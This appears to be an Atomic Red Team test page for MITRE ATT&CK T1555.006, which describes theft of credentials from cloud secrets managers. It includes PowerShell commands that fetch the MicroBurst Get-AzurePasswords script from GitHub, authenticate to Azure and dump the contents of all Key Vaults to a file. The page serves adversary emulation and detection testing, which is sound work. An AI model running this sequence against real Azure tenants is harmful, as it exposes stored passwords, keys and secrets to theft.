T1555.006
Credentials from Password Stores: Cloud Secrets Management Stores
Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.
Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.
If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged Cloud Accounts or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
Note: this technique is distinct from Cloud Instance Metadata API in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
Atomic Tests
Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
Supported Platforms: Iaas:azure
auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Azure AD username | string | |
| password | Azure AD password | string | T1082Az |
| output_file | File to dump results to | string | $env:temp\T1528Test1.txt |
| subscription_id | Azure subscription id to search | string |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzureRmAccount -Credential $Credential
Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
cat #{output_file}Cleanup Commands:
remove-item #{output_file} -force -erroraction silentlycontinueDependencies: Run with powershell!
Description: The Get-AzurePasswords script must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"Description: The Azure RM module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}Get Prereq Commands:
Install-Module -Name AzureRM -Force -allowclobberDescription: The Azure module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}Get Prereq Commands:
Install-Module -Name Azure -Force -allowclobber